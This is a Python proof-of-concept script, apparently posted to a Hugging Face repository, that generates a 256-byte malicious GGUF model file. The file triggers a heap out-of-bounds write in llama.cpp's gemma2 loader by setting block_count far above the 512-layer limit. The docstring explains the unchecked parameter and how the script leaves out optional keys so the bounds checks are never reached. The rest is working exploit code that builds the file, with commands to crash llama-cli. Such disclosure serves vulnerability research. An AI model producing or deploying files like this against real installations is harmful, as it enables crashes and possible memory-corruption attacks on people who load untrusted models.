llama-cpp-nlayer-oob-poc / poc_nlayer_oob.py
salvepilo's picture
Upload poc_nlayer_oob.py with huggingface_hub
777a5ab verified
#!/usr/bin/env python3
"""
PoC: Heap OOB write in llama.cpp via unvalidated n_layer (block_count) parameter.
Vulnerability:
In src/llama-model.cpp line 520, hparams.n_layer is read from the GGUF file:
ml.get_key(LLM_KV_BLOCK_COUNT, hparams.n_layer);
There is NO upper bound check against LLAMA_MAX_LAYERS (512).
However, the hparams arrays that are indexed by layer number are all
std::array<..., LLAMA_MAX_LAYERS> where LLAMA_MAX_LAYERS = 512:
std::array<uint32_t, 512> swa_layers;
std::array<bool, 512> recurrent_layer_arr;
std::array<uint32_t, 512> n_head_arr;
std::array<uint32_t, 512> n_head_kv_arr;
std::array<uint32_t, 512> n_ff_arr;
Note: n_expert IS checked (line 537: GGML_ASSERT(hparams.n_expert <= LLAMA_MAX_EXPERTS)),
proving the developers intended bounds checks but missed n_layer.
Exploitation path (gemma2 architecture):
In the LLM_ARCH_GEMMA2 case (line 1323), set_swa_pattern(2) is called
at line 1327 BEFORE any other key reads.
set_swa_pattern() in llama-hparams.cpp does:
for (uint32_t il = 0; il < n_layer; ++il) {
swa_layers[il] = ...;
}
When n_layer = 10000, this writes 9488 uint32_t values (9488 * 4 = 37952 bytes)
past the end of the swa_layers[512] array on the heap, corrupting through
the rest of hparams and past the end of the llama_model allocation.
The common-path get_key_or_arr() calls for n_ff_arr and n_head_arr at
lines 570-576 DO have an n > N_MAX check, but only AFTER checking if the
key exists. Since these keys are optional (required=false), omitting them
from the GGUF file causes an early return before the bounds check, allowing
execution to reach the arch-specific switch case.
Attack:
- GGUF v3 file with architecture = "gemma2"
- block_count = 10000 (way above 512 limit)
- Minimal required keys: context_length, embedding_length, block_count
- The OOB write corrupts heap memory past the llama_model allocation
Confirmed results:
- ASan build: heap-buffer-overflow detected at llama-hparams.cpp:15
in llama_hparams::set_swa_pattern(), WRITE of size 4
- Regular build: SIGSEGV (exit code 139) due to heap corruption
- Only 256-byte GGUF file needed (zero tensors, minimal KV pairs)
"""
import struct
import os
# GGUF constants
GGUF_MAGIC = b"GGUF"
GGUF_VERSION = 3
# GGUF KV types
GGUF_TYPE_UINT32 = 4
GGUF_TYPE_FLOAT32 = 6
GGUF_TYPE_STRING = 8
# Malicious n_layer value (must be > 512 = LLAMA_MAX_LAYERS)
# Using 10000 to write 10000*4=40000 bytes into a 512*4=2048 byte array,
# overflowing by ~38KB which is enough to go past the entire llama_model
# heap allocation and trigger ASan detection.
MALICIOUS_N_LAYER = 10000
def write_string(f, s):
"""Write a GGUF string: uint64 length + chars (no null terminator)."""
encoded = s.encode('utf-8')
f.write(struct.pack('<Q', len(encoded)))
f.write(encoded)
def write_kv_string(f, key, value):
"""Write a KV pair with string value."""
write_string(f, key)
f.write(struct.pack('<I', GGUF_TYPE_STRING))
write_string(f, value)
def write_kv_uint32(f, key, value):
"""Write a KV pair with uint32 value."""
write_string(f, key)
f.write(struct.pack('<I', GGUF_TYPE_UINT32))
f.write(struct.pack('<I', value))
def write_kv_float32(f, key, value):
"""Write a KV pair with float32 value."""
write_string(f, key)
f.write(struct.pack('<I', GGUF_TYPE_FLOAT32))
f.write(struct.pack('<f', value))
def create_nlayer_oob_gguf(output_path):
"""Create a GGUF file that triggers heap OOB write via n_layer > 512."""
# Architecture string used as prefix for keys: "gemma2"
arch = "gemma2"
# KV pairs we need to provide:
# 1. general.architecture = "gemma2" (required for arch detection)
# 2. gemma2.context_length = 8192 (required, line 517)
# 3. gemma2.embedding_length = 256 (required, line 518)
# 4. gemma2.block_count = 10000 (required, line 520 -- THE TRIGGER)
# 5. gemma2.attention.layer_norm_rms_epsilon (required in gemma2 case, line 1334)
# BUT set_swa_pattern is called at line 1327 BEFORE this key is read,
# so the OOB write happens regardless. We include it to avoid a throw
# that might confuse the output -- but it's not needed for the OOB.
#
# Keys we intentionally OMIT:
# - gemma2.feed_forward_length (optional, would trigger n>N_MAX check)
# - gemma2.attention.head_count (optional, would trigger n>N_MAX check)
# - gemma2.attention.head_count_kv (optional)
kv_pairs = [
("string", "general.architecture", arch),
("uint32", f"{arch}.context_length", 8192),
("uint32", f"{arch}.embedding_length", 256),
("uint32", f"{arch}.block_count", MALICIOUS_N_LAYER),
("float32", f"{arch}.attention.layer_norm_rms_epsilon", 1e-6),
]
n_kv = len(kv_pairs)
n_tensors = 0 # no tensors needed; the OOB happens during hparams loading
with open(output_path, 'wb') as f:
# ===== GGUF Header =====
f.write(GGUF_MAGIC) # magic: "GGUF"
f.write(struct.pack('<I', GGUF_VERSION)) # version: 3
f.write(struct.pack('<Q', n_tensors)) # n_tensors: 0
f.write(struct.pack('<Q', n_kv)) # n_kv
# ===== KV Pairs =====
for kv_type, key, value in kv_pairs:
if kv_type == "string":
write_kv_string(f, key, value)
elif kv_type == "uint32":
write_kv_uint32(f, key, value)
elif kv_type == "float32":
write_kv_float32(f, key, value)
# ===== Alignment padding =====
# GGUF requires data section to be aligned to 32 bytes.
# Even with 0 tensors, write padding for format compliance.
current_pos = f.tell()
alignment = 32
padding_needed = (alignment - (current_pos % alignment)) % alignment
f.write(b'\x00' * padding_needed)
file_size = os.path.getsize(output_path)
print(f"[*] Created: {output_path}")
print(f"[*] File size: {file_size} bytes")
print(f"[*] Architecture: {arch}")
print(f"[*] block_count (n_layer): {MALICIOUS_N_LAYER} (LLAMA_MAX_LAYERS = 512)")
print(f"[*]")
print(f"[*] Vulnerability: set_swa_pattern() at llama-model.cpp:1327 writes")
print(f"[*] swa_layers[il] for il = 0..{MALICIOUS_N_LAYER-1}")
print(f"[*] but swa_layers is std::array<uint32_t, 512>")
print(f"[*] => {MALICIOUS_N_LAYER - 512} OOB writes = {(MALICIOUS_N_LAYER - 512) * 4} bytes past end")
print(f"[*]")
print(f"[*] Test with:")
print(f"[*] ./build/bin/llama-cli -m {output_path} -p 'hello'")
print(f"[*]")
print(f"[*] Test with ASan build:")
print(f"[*] ./build-asan/bin/llama-cli -m {output_path} -p 'hello'")
print(f"[*]")
print(f"[*] Expected: heap-buffer-overflow or crash")
if __name__ == "__main__":
os.makedirs(os.path.dirname(os.path.abspath(__file__)), exist_ok=True)
output_path = "/Users/eltarne/Documents/script/gguf_poc/poc_nlayer_oob.gguf"
create_nlayer_oob_gguf(output_path)